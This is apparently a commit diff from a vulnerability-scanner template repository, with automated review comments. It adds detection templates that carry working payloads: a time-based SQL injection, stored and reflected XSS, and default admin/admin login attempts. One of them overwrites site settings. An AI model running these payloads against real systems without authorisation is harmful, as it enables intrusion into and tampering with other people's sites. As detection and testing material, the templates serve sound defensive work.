Merge branch 'projectdiscovery:main' into pgsql_detect
commit
a9c2622572
|
@ -19,6 +19,7 @@ from bs4 import BeautifulSoup
|
|||
import requests
|
||||
import re
|
||||
from markdown import markdown
|
||||
import os
|
||||
from termcolor import colored, cprint
|
||||
|
||||
# Regex to extract the name of th plugin from the URL
|
||||
|
@ -123,8 +124,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||
|
||||
|
@ -159,14 +159,25 @@ requests:
|
|||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
'''
|
||||
version_file = open(
|
||||
f"helpers/wordpress/plugins/{name}.txt", "w")
|
||||
|
||||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
||||
if not os.path.exists(template_dir):
|
||||
os.makedirs(template_dir)
|
||||
|
||||
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||
version_file = open(helper_path, "w")
|
||||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
# print(template)
|
||||
template_file = open(
|
||||
f"technologies/wordpress/plugins/{name}.yaml", "w")
|
||||
template_path = f"technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
||||
|
|
|
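Review bot: `name` is interpolated into both output paths (`helpers/wordpress/plugins/{name}.txt`, `technologies/wordpress/plugins/{name}.yaml`) and into the template body without any check that it is a plain plugin slug. It appears to come from a scraped URL (the extraction is outside this hunk), so a value containing `/` or `..` would write outside the two directories, and the workflow then commits whatever was written. Reject anything that is not a slug before building the paths. The new `helper_dir` and `template_dir` are absolute, but the files are still opened through relative strings, so build the file paths from those directories. `os.makedirs(..., exist_ok=True)` and `with open(...)` also remove the check-then-create race and the handle left open when a write fails. The enclosing loop or function starts outside the hunk, so the indentation below is a guess.

```python
# … unchanged: work_dir / helper_dir / template_dir assignments …
if not re.fullmatch(r"[a-z0-9][a-z0-9_-]*", name):  # slug alphabet: confirm against real plugin names
    raise ValueError(f"unexpected plugin name: {name!r}")

os.makedirs(helper_dir, exist_ok=True)
os.makedirs(template_dir, exist_ok=True)

with open(os.path.join(helper_dir, f"{name}.txt"), "w") as version_file:
    version_file.write(version)

with open(os.path.join(template_dir, f"{name}.yaml"), "w") as template_file:
    template_file.write(template)
```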
@ -7,9 +7,6 @@ jobs:
|
|||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Install tree
|
||||
run: sudo apt-get install tree -y
|
||||
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
|
@ -25,20 +22,22 @@ jobs:
|
|||
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||
|
||||
- name: Update Templates
|
||||
id: update-templates
|
||||
run: |
|
||||
python3 .github/scripts/wordpress-plugins-update.py
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" -a
|
||||
git add --all
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.TOKEN }}
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
||||
|
|
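Review bot: The push step hands a repository token to `ad-m/github-push-action@master`, a mutable branch reference, so whatever that branch points to at run time executes with write access to this repository. Pin it to a reviewed commit, `uses: ad-m/github-push-action@<full-commit-sha>`. The page does not mark which of the two `github_token` lines is the new one; if it is `secrets.GITHUB_TOKEN`, declare the scope the job needs with a `permissions:` block (`contents: write`) instead of relying on the repository default. `git add --all` stages every file the update script or pip left in the workspace, so limit it to the generated paths: `git add helpers/wordpress/plugins technologies/wordpress/plugins`.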
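--- a/.new-additions
+++ b/.new-additions
@@ -1,230 +0,0 @@
-cves/2021/CVE-2021-30128.yaml
-cves/2021/CVE-2021-42887.yaml
-cves/2022/CVE-2022-0786.yaml
-cves/2022/CVE-2022-25082.yaml
-cves/2022/CVE-2022-33891.yaml
-cves/2022/CVE-2022-45362.yaml
-default-logins/mobotix/mobotix-default-login.yaml
-default-logins/tiny-file-manager-default-login.yaml
-exposed-panels/content-central-login.yaml
-exposed-panels/creatio-login-panel.yaml
-exposed-panels/loxone-panel.yaml
-exposed-panels/ncentral-panel.yaml
-exposed-panels/posthog-admin-panel.yaml
-exposed-panels/webuzo-admin-panel.yaml
-exposed-panels/xfinity-panel.yaml
-exposures/logs/ws-ftp-log.yaml
-exposures/tokens/zenserp/zenscrape-api-key.yaml
-exposures/tokens/zenserp/zenserp-api-key.yaml
-exposures/tokens/zeplin/zeplin-access-token.yaml
-exposures/tokens/zerobounce/zerobounce-api-token.yaml
-iot/carel-plantvisor-panel.yaml
-iot/hue-personal-wireless-panel.yaml
-miscellaneous/gpc-json.yaml
-misconfiguration/sony-bravia-disclosure.yaml
-network/exposed-dockerd.yaml
-technologies/akamai-cache-detect.yaml
-technologies/aws/amazon-ec2-detect.yaml
-technologies/wordpress/plugins/ad-inserter.yaml
-technologies/wordpress/plugins/add-to-any.yaml
-technologies/wordpress/plugins/admin-menu-editor.yaml
-technologies/wordpress/plugins/adminimize.yaml
-technologies/wordpress/plugins/advanced-custom-fields.yaml
-technologies/wordpress/plugins/akismet.yaml
-technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
-technologies/wordpress/plugins/all-in-one-seo-pack.yaml
-technologies/wordpress/plugins/all-in-one-wp-migration.yaml
-technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
-technologies/wordpress/plugins/amp.yaml
-technologies/wordpress/plugins/antispam-bee.yaml
-technologies/wordpress/plugins/astra-sites.yaml
-technologies/wordpress/plugins/astra-widgets.yaml
-technologies/wordpress/plugins/autoptimize.yaml
-technologies/wordpress/plugins/backwpup.yaml
-technologies/wordpress/plugins/better-search-replace.yaml
-technologies/wordpress/plugins/better-wp-security.yaml
-technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
-technologies/wordpress/plugins/breadcrumb-navxt.yaml
-technologies/wordpress/plugins/broken-link-checker.yaml
-technologies/wordpress/plugins/child-theme-configurator.yaml
-technologies/wordpress/plugins/classic-editor.yaml
-technologies/wordpress/plugins/classic-widgets.yaml
-technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
-technologies/wordpress/plugins/cloudflare.yaml
-technologies/wordpress/plugins/cmb2.yaml
-technologies/wordpress/plugins/coblocks.yaml
-technologies/wordpress/plugins/code-snippets.yaml
-technologies/wordpress/plugins/coming-soon.yaml
-technologies/wordpress/plugins/complianz-gdpr.yaml
-technologies/wordpress/plugins/contact-form-7-honeypot.yaml
-technologies/wordpress/plugins/contact-form-7.yaml
-technologies/wordpress/plugins/contact-form-cfdb7.yaml
-technologies/wordpress/plugins/cookie-law-info.yaml
-technologies/wordpress/plugins/cookie-notice.yaml
-technologies/wordpress/plugins/creame-whatsapp-me.yaml
-technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
-technologies/wordpress/plugins/custom-css-js.yaml
-technologies/wordpress/plugins/custom-fonts.yaml
-technologies/wordpress/plugins/custom-post-type-ui.yaml
-technologies/wordpress/plugins/disable-comments.yaml
-technologies/wordpress/plugins/disable-gutenberg.yaml
-technologies/wordpress/plugins/duplicate-page.yaml
-technologies/wordpress/plugins/duplicate-post.yaml
-technologies/wordpress/plugins/duplicator.yaml
-technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
-technologies/wordpress/plugins/easy-fancybox.yaml
-technologies/wordpress/plugins/easy-google-fonts.yaml
-technologies/wordpress/plugins/easy-table-of-contents.yaml
-technologies/wordpress/plugins/easy-wp-smtp.yaml
-technologies/wordpress/plugins/elementor.yaml
-technologies/wordpress/plugins/elementskit-lite.yaml
-technologies/wordpress/plugins/enable-media-replace.yaml
-technologies/wordpress/plugins/envato-elements.yaml
-technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
-technologies/wordpress/plugins/ewww-image-optimizer.yaml
-technologies/wordpress/plugins/facebook-for-woocommerce.yaml
-technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
-technologies/wordpress/plugins/flamingo.yaml
-technologies/wordpress/plugins/fluentform.yaml
-technologies/wordpress/plugins/font-awesome.yaml
-technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
-technologies/wordpress/plugins/formidable.yaml
-technologies/wordpress/plugins/forminator.yaml
-technologies/wordpress/plugins/ga-google-analytics.yaml
-technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
-technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
-technologies/wordpress/plugins/google-listings-and-ads.yaml
-technologies/wordpress/plugins/google-site-kit.yaml
-technologies/wordpress/plugins/google-sitemap-generator.yaml
-technologies/wordpress/plugins/gtranslate.yaml
-technologies/wordpress/plugins/gutenberg.yaml
-technologies/wordpress/plugins/happy-elementor-addons.yaml
-technologies/wordpress/plugins/header-and-footer-scripts.yaml
-technologies/wordpress/plugins/header-footer-code-manager.yaml
-technologies/wordpress/plugins/header-footer-elementor.yaml
-technologies/wordpress/plugins/header-footer.yaml
-technologies/wordpress/plugins/health-check.yaml
-technologies/wordpress/plugins/hello-dolly.yaml
-technologies/wordpress/plugins/imagify.yaml
-technologies/wordpress/plugins/imsanity.yaml
-technologies/wordpress/plugins/insert-headers-and-footers.yaml
-technologies/wordpress/plugins/instagram-feed.yaml
-technologies/wordpress/plugins/intuitive-custom-post-order.yaml
-technologies/wordpress/plugins/iwp-client.yaml
-technologies/wordpress/plugins/jetpack.yaml
-technologies/wordpress/plugins/kadence-blocks.yaml
-technologies/wordpress/plugins/kirki.yaml
-technologies/wordpress/plugins/leadin.yaml
-technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
-technologies/wordpress/plugins/limit-login-attempts.yaml
-technologies/wordpress/plugins/litespeed-cache.yaml
-technologies/wordpress/plugins/loco-translate.yaml
-technologies/wordpress/plugins/loginizer.yaml
-technologies/wordpress/plugins/loginpress.yaml
-technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
-technologies/wordpress/plugins/mailchimp-for-wp.yaml
-technologies/wordpress/plugins/mailpoet.yaml
-technologies/wordpress/plugins/maintenance.yaml
-technologies/wordpress/plugins/mainwp-child.yaml
-technologies/wordpress/plugins/malcare-security.yaml
-technologies/wordpress/plugins/megamenu.yaml
-technologies/wordpress/plugins/members.yaml
-technologies/wordpress/plugins/meta-box.yaml
-technologies/wordpress/plugins/ml-slider.yaml
-technologies/wordpress/plugins/newsletter.yaml
-technologies/wordpress/plugins/nextend-facebook-connect.yaml
-technologies/wordpress/plugins/nextgen-gallery.yaml
-technologies/wordpress/plugins/ninja-forms.yaml
-technologies/wordpress/plugins/ocean-extra.yaml
-technologies/wordpress/plugins/official-facebook-pixel.yaml
-technologies/wordpress/plugins/one-click-demo-import.yaml
-technologies/wordpress/plugins/optinmonster.yaml
-technologies/wordpress/plugins/password-protected.yaml
-technologies/wordpress/plugins/pdf-embedder.yaml
-technologies/wordpress/plugins/photo-gallery.yaml
-technologies/wordpress/plugins/php-compatibility-checker.yaml
-technologies/wordpress/plugins/pixelyoursite.yaml
-technologies/wordpress/plugins/polylang.yaml
-technologies/wordpress/plugins/popup-builder.yaml
-technologies/wordpress/plugins/popup-maker.yaml
-technologies/wordpress/plugins/post-smtp.yaml
-technologies/wordpress/plugins/post-types-order.yaml
-technologies/wordpress/plugins/premium-addons-for-elementor.yaml
-technologies/wordpress/plugins/pretty-link.yaml
-technologies/wordpress/plugins/really-simple-captcha.yaml
-technologies/wordpress/plugins/really-simple-ssl.yaml
-technologies/wordpress/plugins/redirection.yaml
-technologies/wordpress/plugins/redux-framework.yaml
-technologies/wordpress/plugins/regenerate-thumbnails.yaml
-technologies/wordpress/plugins/safe-svg.yaml
-technologies/wordpress/plugins/seo-by-rank-math.yaml
-technologies/wordpress/plugins/sg-cachepress.yaml
-technologies/wordpress/plugins/sg-security.yaml
-technologies/wordpress/plugins/shortcodes-ultimate.yaml
-technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
-technologies/wordpress/plugins/simple-custom-post-order.yaml
-technologies/wordpress/plugins/simple-page-ordering.yaml
-technologies/wordpress/plugins/siteguard.yaml
-technologies/wordpress/plugins/siteorigin-panels.yaml
-technologies/wordpress/plugins/smart-slider-3.yaml
-technologies/wordpress/plugins/so-widgets-bundle.yaml
-technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml
-technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
-technologies/wordpress/plugins/sucuri-scanner.yaml
-technologies/wordpress/plugins/svg-support.yaml
-technologies/wordpress/plugins/table-of-contents-plus.yaml
-technologies/wordpress/plugins/tablepress.yaml
-technologies/wordpress/plugins/taxonomy-terms-order.yaml
-technologies/wordpress/plugins/the-events-calendar.yaml
-technologies/wordpress/plugins/themeisle-companion.yaml
-technologies/wordpress/plugins/tinymce-advanced.yaml
-technologies/wordpress/plugins/translatepress-multilingual.yaml
-technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
-technologies/wordpress/plugins/under-construction-page.yaml
-technologies/wordpress/plugins/unyson.yaml
-technologies/wordpress/plugins/updraftplus.yaml
-technologies/wordpress/plugins/use-any-font.yaml
-technologies/wordpress/plugins/user-role-editor.yaml
-technologies/wordpress/plugins/velvet-blues-update-urls.yaml
-technologies/wordpress/plugins/w3-total-cache.yaml
-technologies/wordpress/plugins/webp-converter-for-media.yaml
-technologies/wordpress/plugins/widget-importer-exporter.yaml
-technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
-technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
-technologies/wordpress/plugins/woo-variation-swatches.yaml
-technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
-technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
-technologies/wordpress/plugins/woocommerce-payments.yaml
-technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
-technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
-technologies/wordpress/plugins/woocommerce-services.yaml
-technologies/wordpress/plugins/woocommerce.yaml
-technologies/wordpress/plugins/woosidebars.yaml
-technologies/wordpress/plugins/wordfence.yaml
-technologies/wordpress/plugins/wordpress-importer.yaml
-technologies/wordpress/plugins/wordpress-seo.yaml
-technologies/wordpress/plugins/worker.yaml
-technologies/wordpress/plugins/wp-fastest-cache.yaml
-technologies/wordpress/plugins/wp-file-manager.yaml
-technologies/wordpress/plugins/wp-google-maps.yaml
-technologies/wordpress/plugins/wp-mail-smtp.yaml
-technologies/wordpress/plugins/wp-maintenance-mode.yaml
-technologies/wordpress/plugins/wp-migrate-db.yaml
-technologies/wordpress/plugins/wp-multibyte-patch.yaml
-technologies/wordpress/plugins/wp-optimize.yaml
-technologies/wordpress/plugins/wp-pagenavi.yaml
-technologies/wordpress/plugins/wp-reset.yaml
-technologies/wordpress/plugins/wp-sitemap-page.yaml
-technologies/wordpress/plugins/wp-smushit.yaml
-technologies/wordpress/plugins/wp-statistics.yaml
-technologies/wordpress/plugins/wp-super-cache.yaml
-technologies/wordpress/plugins/wp-user-avatar.yaml
-technologies/wordpress/plugins/wpcf7-recaptcha.yaml
-technologies/wordpress/plugins/wpcf7-redirect.yaml
-technologies/wordpress/plugins/wpforms-lite.yaml
-technologies/wordpress/plugins/wps-hide-login.yaml
-technologies/wordpress/plugins/yith-woocommerce-compare.yaml
-technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
-vulnerabilities/amazon/amazon-ec2-ssrf.yaml
-vulnerabilities/other/digital-ocean-ssrf.yaml
-vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml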
@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**328 directories, 4791 files**.
|
||||
**335 directories, 5229 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -4,10 +4,11 @@ info:
|
|||
name: OpenTSDB <= 2.4.0 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
|
||||
description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
|
||||
reference:
|
||||
- https://github.com/OpenTSDB/opentsdb/issues/2051
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
|
||||
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -10,11 +10,12 @@ info:
|
|||
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
|
||||
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
|
||||
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
|
||||
classification:
|
||||
cve-id: CVE-2022-23854
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"InTouch Access Anywhere"
|
||||
verified: "true"
|
||||
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-3768
|
||||
|
||||
info:
|
||||
name: WPSmartContracts < 1.3.12 - Author SQLi
|
||||
author: Hardik-Solanki
|
||||
severity: high
|
||||
description: |
|
||||
The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
|
||||
remediation: Fixed in version 1.3.12
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-3768
|
||||
- https://cve.report/CVE-2022-3768
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-3768
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_2>=5'
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(content_type_2, "text/html")'
|
||||
- 'contains(body_2, "Batch Mint NFTs")'
|
||||
condition: and
|
|
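Review bot: The only condition in the matcher that depends on the injection is `duration_2>=5`. The other three (`status_code_2 == 200`, the `text/html` content type and the "Batch Mint NFTs" string) only show that the page loaded for a logged-in user, so a slow or loaded backend that takes five seconds to answer is reported as a high-severity SQLi. Record that limit in the template with a comment above the matcher, `# time-based check: a slow response alone satisfies duration_2>=5, confirm findings manually`. The `info` block should also state that the template needs the `username` and `password` variables of an account with at least the author role, which the description implies but the template does not say.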
@ -0,0 +1,66 @@
|
|||
id: CVE-2022-4260
|
||||
|
||||
info:
|
||||
name: WP-Ban < 1.69.1 - Admin Stored XSS
|
||||
author: Hardik-Solanki
|
||||
severity: high
|
||||
description: |
|
||||
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
|
||||
remediation: Fixed in version 1.69.1
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
|
||||
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
|
||||
classification:
|
||||
cve-id: CVE-2022-4260
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: XSS
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_4, "<script>alert(document.domain);</script>")'
|
||||
- 'contains(content_type_4, "text/html")'
|
||||
- 'status_code_4 == 200'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: nonce
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '_wpnonce=([0-9a-z]+)'
|
||||
internal: true
|
|
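Review bot: The third request changes state on the scanned site: it saves the wp-ban options with a script in `banned_template_message` and `XSS` in `banned_referers`, and nothing in the template restores the previous values. A scan therefore leaves a modified ban configuration and a persisted script behind. Mark that in the tags, `tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated,intrusive`, so operators can filter the template out of runs against production, and say in the description that settings are overwritten. The `nonce` extractor is not tied to a particular response, and the request before the POST is `GET /`. Whether that page carries the nonce the options form expects is not visible here and should be confirmed.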
@ -0,0 +1,32 @@
|
|||
id: CVE-2022-46381
|
||||
|
||||
info:
|
||||
name: Certain Linear eMerge E3-Series - Cross Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381
|
||||
- https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: http.html:"Linear eMerge"
|
||||
tags: cve,cve2022,xss,emerge,linear
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/><svg/onload="alert(document.domain)"/>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<svg/onload="alert(document.domain)"/>'
|
||||
- 'Badging Template'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
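Review bot: The matchers accept any 200 response that contains the two strings, whatever its content type, so an endpoint that echoes the query into JSON or plain text would be reported as XSS. Add a header matcher for `text/html`, as the CVE-2022-4260 template in this commit does with `content_type_4`. The `info` block also has no `classification` entry with `cve-id: CVE-2022-46381`, which the other CVE templates on this page carry.

```yaml
      # … unchanged: body word matcher …
      - type: word
        part: header
        words:
          - text/html
      # … unchanged: status matcher …
```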
@ -0,0 +1,60 @@
|
|||
id: kanboard-default-login
|
||||
|
||||
info:
|
||||
name: Kanboard Default Login
|
||||
author: shelled
|
||||
severity: high
|
||||
description: Kanboard default login was discovered.
|
||||
reference:
|
||||
- https://twitter.com/0x_rood/status/1607068644634157059
|
||||
- https://github.com/kanboard/kanboard
|
||||
- https://docs.kanboard.org/v1/admin/installation/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:2056442365
|
||||
tags: default-login,kanboard
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?controller=AuthController&action=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?controller=AuthController&action=check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
|
||||
|
||||
- |
|
||||
GET /?controller=DashboardController&action=show HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
user:
|
||||
- admin
|
||||
pass:
|
||||
- admin
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_token
|
||||
part: body
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'New project'
|
||||
- 'Project management'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
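Review bot: This template has no `classification` block, while the X-UI default-login template added in the same commit records `cwe-id: CWE-798`. Adding the same entry here lets both default-credential findings be triaged alike. The description `Kanboard default login was discovered.` does not say what was found or what to do; something like `Kanboard accepts the default admin/admin credentials; change the administrator password.` is more useful in a report. The extractor regex is easier to read single-quoted, without the escaped quotes: `'hidden" name="csrf_token" value="([0-9a-z]+)"'`.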
@ -0,0 +1,48 @@
|
|||
id: xui-weak-login
|
||||
|
||||
info:
|
||||
name: X-UI Login Default Login
|
||||
author: dali
|
||||
severity: high
|
||||
description: |
|
||||
X-UI Default Login Credentials.
|
||||
reference:
|
||||
- https://github.com/vaxilu/x-ui
|
||||
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
|
||||
classification:
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: title:"X-UI Login"
|
||||
tags: x-ui,default-login
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login"
|
||||
headers:
|
||||
content-type: application/x-www-form-urlencoded
|
||||
body: "username={{username}}&password={{password}}"
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- "admin"
|
||||
password:
|
||||
- "admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"success":true'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
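Review bot: Nothing in the matchers is specific to X-UI: any service that answers `POST {{BaseURL}}/login` with status 200, a JSON content type and `"success":true` in the body is reported as a high-severity default login. Add a condition tied to the product, such as a response field or cookie name that only the X-UI login returns (to be confirmed against a real instance, since the page shows none). The name `X-UI Login Default Login` repeats itself, so `X-UI - Default Login` would read better. The id `xui-weak-login` could also follow the `-default-login` pattern used by `kanboard-default-login`.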
@ -0,0 +1,30 @@
|
|||
id: atlantis-detect
|
||||
|
||||
info:
|
||||
name: Atlantis Detect
|
||||
author: jonathanwalker
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/runatlantis/atlantis
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:-1706783005
|
||||
tags: panel,atlantis
|
||||
